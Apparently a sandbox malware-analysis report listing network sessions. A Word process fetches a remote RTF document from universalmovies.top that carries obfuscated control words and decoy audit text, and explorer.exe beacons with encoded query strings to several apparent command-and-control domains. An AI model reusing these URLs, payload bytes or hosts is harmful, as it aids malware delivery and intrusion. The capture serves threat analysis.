                                                                              Jun 25, 2024 15:15:34.385117054 CEST173OUTGET /btrd/?QF=iWZ7HQ0CWyfkF/Kk3421ksonIyAGE9NlyJN9a/ri56tzwIjQ6AOy1EoBknvhN8HBdF2LXg==&rr=F82tHBM8VV6X-vo HTTP/1.1
                                                                              Host: www.cnoszirzbkaqz.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Jun 25, 2024 15:15:34.949536085 CEST114INHTTP/1.1 404
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 25 Jun 2024 13:15:34 GMT
                                                                              Content-Length: 0
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.224917915.197.148.33801244C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jun 25, 2024 15:15:55.182688951 CEST173OUTGET /btrd/?QF=Y4OHzCgJWVe/aTk998zcBEsdCVoOVR410Fz81Fwxat8Qm64dtgVu5ywIvZ7n99il4dROUQ==&rr=F82tHBM8VV6X-vo HTTP/1.1
                                                                              Host: www.naddafornadda.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Jun 25, 2024 15:15:55.665208101 CEST349INHTTP/1.1 200 OK
                                                                              Server: openresty
                                                                              Date: Tue, 25 Jun 2024 13:15:55 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 209
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 46 3d 59 34 4f 48 7a 43 67 4a 57 56 65 2f 61 54 6b 39 39 38 7a 63 42 45 73 64 43 56 6f 4f 56 52 34 31 30 46 7a 38 31 46 77 78 61 74 38 51 6d 36 34 64 74 67 56 75 35 79 77 49 76 5a 37 6e 39 39 69 6c 34 64 52 4f 55 51 3d 3d 26 72 72 3d 46 38 32 74 48 42 4d 38 56 56 36 58 2d 76 6f 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?QF=Y4OHzCgJWVe/aTk998zcBEsdCVoOVR410Fz81Fwxat8Qm64dtgVu5ywIvZ7n99il4dROUQ==&rr=F82tHBM8VV6X-vo"}</script></head></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.22491803.33.130.190801244C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jun 25, 2024 15:16:55.778409958 CEST170OUTGET /btrd/?QF=8JOSXYLBILqnqGN87u1l6qhyR4gCsQ4B50iPBg5WSNoqgl4+2/FdKIi+y78puliTpEIA7Q==&rr=F82tHBM8VV6X-vo HTTP/1.1
                                                                              Host: www.texanboxes.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Jun 25, 2024 15:16:56.259752035 CEST349INHTTP/1.1 200 OK
                                                                              Server: openresty
                                                                              Date: Tue, 25 Jun 2024 13:16:56 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 209
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 46 3d 38 4a 4f 53 58 59 4c 42 49 4c 71 6e 71 47 4e 38 37 75 31 6c 36 71 68 79 52 34 67 43 73 51 34 42 35 30 69 50 42 67 35 57 53 4e 6f 71 67 6c 34 2b 32 2f 46 64 4b 49 69 2b 79 37 38 70 75 6c 69 54 70 45 49 41 37 51 3d 3d 26 72 72 3d 46 38 32 74 48 42 4d 38 56 56 36 58 2d 76 6f 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?QF=8JOSXYLBILqnqGN87u1l6qhyR4gCsQ4B50iPBg5WSNoqgl4+2/FdKIi+y78puliTpEIA7Q==&rr=F82tHBM8VV6X-vo"}</script></head></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.22491815.149.161.103801244C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jun 25, 2024 15:17:16.459708929 CEST169OUTGET /btrd/?QF=wAVsI0ZauuZe/AUfKMQS9arC9N7mEche6F3f3LieAEN9BV05ageRHgJkodQ/PaJpE4394Q==&rr=F82tHBM8VV6X-vo HTTP/1.1
                                                                              Host: www.outletivo.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Jun 25, 2024 15:17:17.329193115 CEST156INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Tue, 25 Jun 2024 13:17:17 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Content-Length: 0
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.2249182156.241.141.214801244C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jun 25, 2024 15:17:35.364789009 CEST166OUTGET /btrd/?QF=Q9lQV6GZS5XlTzDabQN0JcC/oAJcX56bqSzBmZTdiCofqsMdr9nyT/BrN0q/NN7gaO6C5w==&rr=F82tHBM8VV6X-vo HTTP/1.1
                                                                              Host: www.380747.net
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.2249183192.243.61.227801244C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jun 25, 2024 15:17:56.714740038 CEST182OUTGET /btrd/?QF=G5lr6/+HMLb4/5wZr2dUNb9GEJVmzQOhD2on9EEX18ujBqnljNww4TGU/x6wH+Q7WyKaqg==&rr=F82tHBM8VV6X-vo HTTP/1.1
                                                                              Host: www.emeraldsurrogatefabric.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Jun 25, 2024 15:17:57.177083969 CEST590INHTTP/1.1 301 Moved Permanently
                                                                              Server: nginx/1.21.6
                                                                              Date: Tue, 25 Jun 2024 13:17:57 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 169
                                                                              Connection: close
                                                                              Location: https://google.com
                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                              Cache-Control: no-cache
                                                                              X-Request-ID: f8e2a4e37fe7d6189aee5c997ec4a483
                                                                              Cache-Control: max-age=0, private, no-cache
                                                                              Pragma: no-cache
                                                                              Strict-Transport-Security: max-age=0; includeSubdomains
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 31 2e 36 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.21.6</center></body></html>


                                                                              HTTPS Proxied Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.2249166172.67.162.954432732C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-25 13:13:42 UTC141OUTOPTIONS / HTTP/1.1
                                                                              User-Agent: Microsoft Office Protocol Discovery
                                                                              Host: universalmovies.top
                                                                              Content-Length: 0
                                                                              Connection: Keep-Alive
                                                                              2024-06-25 13:13:42 UTC715INHTTP/1.1 200 OK
                                                                              Date: Tue, 25 Jun 2024 13:13:42 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Allow: HEAD,GET,POST,OPTIONS,TRACE
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qII0PDSKv73Dq3%2FJv%2BV4PF9aQCn2R5p%2Bq1970xVsyNje1TEET3EsN10jF54weLaZHjY8xRZPCn22Qiihf3V%2BTisAwumsZYSm0u%2FNVIALSVJLNI0o9TBZMJQxhCSWXcRx7Qa1M8Al"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                              X-Content-Type-Options: nosniff
                                                                              Server: cloudflare
                                                                              CF-RAY: 899537688a84c425-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-06-25 13:13:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.2249167172.67.162.954432732C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-25 13:13:46 UTC128OUTHEAD /nelb.doc HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              User-Agent: Microsoft Office Existence Discovery
                                                                              Host: universalmovies.top
                                                                              2024-06-25 13:13:46 UTC841INHTTP/1.1 200 OK
                                                                              Date: Tue, 25 Jun 2024 13:13:46 GMT
                                                                              Content-Type: application/msword
                                                                              Content-Length: 574773
                                                                              Connection: close
                                                                              Last-Modified: Tue, 25 Jun 2024 07:45:34 GMT
                                                                              ETag: "667a759e-8c535"
                                                                              Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                              Cache-Control: max-age=315360000
                                                                              CF-Cache-Status: HIT
                                                                              Age: 18275
                                                                              Accept-Ranges: bytes
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ht1Tj%2Fy6V9Su4sWi2Evu1U8OCZbdL09l3ZR170cFXIJkC55%2FBO5lcPbzC8%2FUEcMRZEbQJ0nEC72vVRwMI5gjGL0deCkjwCi%2Bi8vwLyCQZUq2g5vV63PwR9nkFhhidqrRJWzFVDBe"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                              X-Content-Type-Options: nosniff
                                                                              Server: cloudflare
                                                                              CF-RAY: 89953780c98b43b1-EWR
                                                                              alt-svc: h3=":443"; ma=86400


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              2192.168.2.2249168172.67.162.95443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-25 13:13:50 UTC136OUTOPTIONS / HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                                              translate: f
                                                                              Host: universalmovies.top
                                                                              2024-06-25 13:13:50 UTC713INHTTP/1.1 200 OK
                                                                              Date: Tue, 25 Jun 2024 13:13:50 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Allow: HEAD,GET,POST,OPTIONS,TRACE
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZzUP0vqxQC4Wp0tVIkSGbyDNLASiELGTvc8YMS5KjSzon6kGtbT9%2Bq3KZVhlqeUM%2FFRYFZjwZzAtdkIUJwDxBXeUn0ktsf6uMixLAqFANnIm7e%2BN7Tne%2FELkdGaGu8qMzwqEUypS"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                              X-Content-Type-Options: nosniff
                                                                              Server: cloudflare
                                                                              CF-RAY: 899537995c734411-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-06-25 13:13:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              3192.168.2.2249169172.67.162.95443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-25 13:13:51 UTC166OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 75 6e 69 76 65 72 73 61 6c 6d 6f 76 69 65 73 2e 74 6f 70 0d 0a 0d 0a
                                                                              Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: universalmovies.top
                                                                              2024-06-25 13:13:51 UTC742INHTTP/1.1 405 Method Not Allowed
                                                                              Date: Tue, 25 Jun 2024 13:13:51 GMT
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Allow: HEAD,GET,POST,OPTIONS,TRACE
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tsHbabaYknA9YKQLf5KQi%2FV%2BwPIs7Zcs1s50fSQvh%2Fitx4qMAJfpe8vnPyvlyg%2BNkMDpo7LWlpDqDqQSqUcmh4s%2FDH%2FTlVI2Korw%2FcgTTQ3POJXaRbEHbLGQW5akEPw%2FkJsbIHCz"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                              X-Content-Type-Options: nosniff
                                                                              Server: cloudflare
                                                                              CF-RAY: 899537a17c4318b8-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-06-25 13:13:51 UTC231INData Raw: 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                              Data Ascii: e1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>
                                                                              2024-06-25 13:13:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              4192.168.2.2249170172.67.162.95443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-25 13:13:53 UTC166OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 75 6e 69 76 65 72 73 61 6c 6d 6f 76 69 65 73 2e 74 6f 70 0d 0a 0d 0a
                                                                              Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: universalmovies.top
                                                                              2024-06-25 13:13:53 UTC732INHTTP/1.1 405 Method Not Allowed
                                                                              Date: Tue, 25 Jun 2024 13:13:53 GMT
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Allow: HEAD,GET,POST,OPTIONS,TRACE
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X0s78kAOaJi4iIV2xw3dFkwmCuZuEqxrknVHVhTAhyOti4UrsNm7mLGOEw8o0%2BtaenfcXbUhVPg67S0RRO6JUG5mMCdko7KJoHH9LmmO5XrluKIB8ge%2BY2kzqYQDnMM8FJOdKJa%2F"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                              X-Content-Type-Options: nosniff
                                                                              Server: cloudflare
                                                                              CF-RAY: 899537ac8f0c420a-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-06-25 13:13:53 UTC230INData Raw: 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: e0<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>
                                                                              2024-06-25 13:13:53 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                                              Data Ascii: 1
                                                                              2024-06-25 13:13:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.2249171172.67.162.954432732C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-25 13:13:54 UTC358OUTGET /nelb.doc HTTP/1.1
                                                                              Accept: */*
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                                                              UA-CPU: AMD64
                                                                              Accept-Encoding: gzip, deflate
                                                                              Host: universalmovies.top
                                                                              Connection: Keep-Alive
                                                                              2024-06-25 13:13:54 UTC839INHTTP/1.1 200 OK
                                                                              Date: Tue, 25 Jun 2024 13:13:54 GMT
                                                                              Content-Type: application/msword
                                                                              Content-Length: 574773
                                                                              Connection: close
                                                                              Last-Modified: Tue, 25 Jun 2024 07:45:34 GMT
                                                                              ETag: "667a759e-8c535"
                                                                              Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                              Cache-Control: max-age=315360000
                                                                              CF-Cache-Status: HIT
                                                                              Age: 18283
                                                                              Accept-Ranges: bytes
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rFO2vob0bpjy1F2PbtgLr5LknmMmscgPU8CJ2ou7vFUhvqF8AE5v1nFpcsB6f18VjPKS65MA2%2FCGR%2B41hvNUCo9BHva9o0EYwNRW4wlJ4dyawihcyOFRNf5Dj2PJH9VZTYP%2FvMa3"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                              X-Content-Type-Options: nosniff
                                                                              Server: cloudflare
                                                                              CF-RAY: 899537b1ffa743b5-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-06-25 13:13:54 UTC530INData Raw: 7b 5c 72 74 66 31 0d 0d 7b 5c 2a 5c 37 62 4e 5a 6e 4e 72 72 77 38 47 77 34 74 6a 51 38 4f 54 6e 58 75 73 75 53 61 75 77 47 6c 6d 4b 4e 6f 6d 44 45 77 56 78 5a 58 39 79 76 57 44 70 50 38 4f 59 6b 6f 65 46 55 4f 69 72 5a 66 63 49 34 77 65 6c 44 38 55 4a 65 71 59 67 78 75 6a 4f 50 31 39 33 30 6e 4f 76 6b 6f 76 6e 34 46 63 31 6b 51 6a 73 6c 73 34 35 68 54 47 6b 42 76 58 4a 64 53 57 76 4d 6d 4f 36 6a 47 4b 50 6d 52 33 66 75 66 71 43 75 35 58 53 47 70 33 70 64 56 77 69 64 71 49 72 6f 66 76 77 30 38 68 4d 6b 38 45 4e 36 32 6a 4f 67 64 42 59 73 4a 68 5a 4d 59 43 6d 76 5a 46 55 51 4e 46 61 34 70 6f 49 7a 46 50 4a 73 7a 43 37 38 53 48 58 33 4c 30 63 4e 78 63 64 32 34 41 54 43 6e 67 43 55 6c 54 73 58 67 72 64 6a 74 31 32 47 53 7d 0d 0d 7b 5c 34 39 36 34 35 31 39 36
                                                                              Data Ascii: {\rtf1{\*\7bNZnNrrw8Gw4tjQ8OTnXusuSauwGlmKNomDEwVxZX9yvWDpP8OYkoeFUOirZfcI4welD8UJeqYgxujOP1930nOvkovn4Fc1kQjsls45hTGkBvXJdSWvMmO6jGKPmR3fufqCu5XSGp3pdVwidqIrofvw08hMk8EN62jOgdBYsJhZMYCmvZFUQNFa4poIzFPJszC78SHX3L0cNxcd24ATCngCUlTsXgrdjt12GS}{\49645196
                                                                              2024-06-25 13:13:54 UTC1369INData Raw: 66 69 6e 61 6e 63 69 61 6c 20 73 74 61 74 65 6d 65 6e 74 73 2c 20 70 72 6f 66 65 73 73 69 6f 6e 61 6c 20 73 74 61 6e 64 61 72 64 73 20 72 65 71 75 69 72 65 20 74 68 61 74 20 61 75 64 69 74 6f 72 73 20 6f 62 74 61 69 6e 20 61 6e 20 75 6e 64 65 72 73 74 61 6e 64 69 6e 67 20 6f 66 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 73 20 74 6f 20 74 68 65 20 65 78 74 65 6e 74 20 6e 65 63 65 73 73 61 72 79 20 74 6f 20 70 6c 61 6e 20 74 68 65 20 61 75 64 69 74 2e 20 41 75 64 69 74 6f 72 73 20 75 73 65 20 74 68 69 73 20 75 6e 64 65 72 73 74 61 6e 64 69 6e 67 20 6f 66 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 73 20 74 6f 20 61 73 73 65 73 73 20 74 68 65 20 72 69 73 6b 20 6f 66 20 6d 61 74 65 72 69 61 6c 20 6d 69 73 73 74 61 74 65 6d 65 6e 74 20 6f 66 20
                                                                              Data Ascii: financial statements, professional standards require that auditors obtain an understanding of internal controls to the extent necessary to plan the audit. Auditors use this understanding of internal controls to assess the risk of material misstatement of
                                                                              2024-06-25 13:13:54 UTC1369INData Raw: 20 74 68 61 74 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 73 20 77 6f 75 6c 64 20 6e 6f 74 20 70 72 65 76 65 6e 74 20 6f 72 20 64 65 74 65 63 74 20 61 6e 64 20 63 6f 72 72 65 63 74 20 74 68 65 20 6d 69 73 73 74 61 74 65 6d 65 6e 74 73 2e 20 4f 6e 65 20 63 6f 6d 6d 6f 6e 20 65 78 61 6d 70 6c 65 20 6f 66 20 61 20 64 65 66 69 63 69 65 6e 63 79 20 69 6e 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 20 74 68 61 74 92 73 20 73 65 76 65 72 65 20 65 6e 6f 75 67 68 20 74 6f 20 62 65 20 63 6f 6e 73 69 64 65 72 65 64 20 61 20 6d 61 74 65 72 69 61 6c 20 77 65 61 6b 6e 65 73 73 20 6f 72 20 73 69 67 6e 69 66 69 63 61 6e 74 20 64 65 66 69 63 69 65 6e 63 79 20 69 73 20 77 68 65 6e 20 61 6e 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 20 6c 61 63 6b 73 20 74 68 65
                                                                              Data Ascii: that internal controls would not prevent or detect and correct the misstatements. One common example of a deficiency in internal control thats severe enough to be considered a material weakness or significant deficiency is when an organization lacks the
                                                                              2024-06-25 13:13:54 UTC1369INData Raw: 64 20 6d 75 73 74 20 63 6f 6e 74 69 6e 75 65 20 74 6f 20 62 65 20 63 6f 6d 6d 75 6e 69 63 61 74 65 64 20 69 6e 20 77 72 69 74 69 6e 67 20 75 6e 74 69 6c 20 74 68 65 20 64 65 66 69 63 69 65 6e 63 79 20 69 73 20 63 6f 72 72 65 63 74 65 64 2e 4f 74 68 65 72 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 20 64 65 66 69 63 69 65 6e 63 69 65 73 20 69 64 65 6e 74 69 66 69 65 64 20 64 75 72 69 6e 67 20 74 68 65 20 61 75 64 69 74 20 74 68 61 74 20 61 72 65 20 6e 6f 74 20 63 6f 6e 73 69 64 65 72 65 64 20 73 65 76 65 72 65 20 65 6e 6f 75 67 68 20 74 6f 20 62 65 20 73 69 67 6e 69 66 69 63 61 6e 74 20 64 65 66 69 63 69 65 6e 63 69 65 73 20 6f 72 20 6d 61 74 65 72 69 61 6c 20 77 65 61 6b 6e 65 73 73 65 73 20 6e 65 65 64 20 6e 6f 74 20 62 65 20 63 6f 6d 6d 75 6e 69
                                                                              Data Ascii: d must continue to be communicated in writing until the deficiency is corrected.Other internal control deficiencies identified during the audit that are not considered severe enough to be significant deficiencies or material weaknesses need not be communi
